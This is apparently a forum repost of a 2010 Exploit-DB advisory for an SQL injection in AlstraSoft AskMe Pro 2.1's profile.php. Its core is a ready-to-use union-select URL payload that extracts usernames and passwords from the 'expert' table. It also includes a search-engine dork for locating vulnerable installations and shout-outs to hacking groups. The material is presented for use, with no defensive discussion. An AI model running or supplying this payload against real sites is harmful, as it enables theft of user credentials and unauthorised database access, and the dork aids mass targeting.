- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14986
- Проверка EDB
-
- Пройдено
- Автор
- COBRA_21
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-09-12
Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection
Код:
########################################################################################
AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability
########################################################################################
Author : CoBRa_21
Author Web Page : null [ I've sold my website (ipbul.org) ]
Dork : inurl:forum_answer.php?que_id
Script Page : http://www.alstrasoft.com/
########################################################################################
Sql Injection :
http://localhost/[path]/profile.php?id=-5 union select 0,group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from+expert
########################################################################################
Thanks cyber-warrior.org & e-banka.org & AKINCILAR & ipbul.org
########################################################################################- Источник
- www.exploit-db.com
